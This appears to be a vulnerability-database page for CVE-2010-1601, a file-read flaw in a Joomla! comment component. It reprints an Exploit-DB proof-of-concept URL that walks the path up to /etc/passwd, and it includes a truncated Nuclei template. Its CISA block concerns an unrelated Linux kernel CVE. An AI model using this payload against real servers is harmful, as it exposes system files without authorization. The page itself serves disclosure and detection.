CVE-2010-1601
published 2010-04-29
CVE-2010-1601: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in…
Priority P3 · 40 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS 15.97% (96.5th percentile)
Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
cisa · 7.8 HIGH
GHSA
GHSA-q9x5-37gw-5q88: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a
ghsa_unreviewed·2022-05-17
CVE-2010-1601 [MEDIUM] CWE-22 GHSA-q9x5-37gw-5q88: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a
Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
CISA
Linux Kernel Improper Input Validation Vulnerability
cisa·2023-05-12·CVSS 7.8
CVE-2010-3904 [HIGH] CWE-20 Linux Kernel Improper Input Validation Vulnerability
Vulnerability: Linux Kernel Improper Input Validation Vulnerability
Affected: Linux Kernel
Linux Kernel contains an improper input validation vulnerability in the Reliable Datagram Sockets (RDS) protocol implementation that allows local users to gain privileges via crafted use of the sendmsg and recvmsg system calls.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://lkml.iu.edu/hypermail/linux/kernel/1601.3/06474.html; https://nvd.nist.gov/vuln/detail/CVE-2010-3904
Remediation Due Date: 2023-06-02
No detection rules found.
Exploit-DB
Joomla! Component JA Comment - Local File Inclusion
exploitdb·2010-04-14
CVE-2010-1601 Joomla! Component JA Comment - Local File Inclusion
---
[o] Joomla Component JA Comment Local File Inclusion Vulnerability
Software : com_jacomment
Vendor : http://www.joomlart.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_jacomment&view=[LFI]
[o] PoC
http://localhost/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
[o] April 14 2010 - GMT +07:00 Jakarta, Indonesia
Nuclei
Joomla! Component JA Comment - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1601 [MEDIUM] Joomla! Component JA Comment - Local File Inclusion
A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Template:
id: CVE-2010-1601
info:
  name: Joomla! Component JA Comment - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage.
  remediation: |
    Apply the latest security
http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt
http://secunia.com/advisories/39472
http://www.exploit-db.com/exploits/12236
http://www.osvdb.org/63802
http://www.securityfocus.com/bid/39516
https://exchange.xforce.ibmcloud.com/vulnerabilities/57848
Published 2010-04-29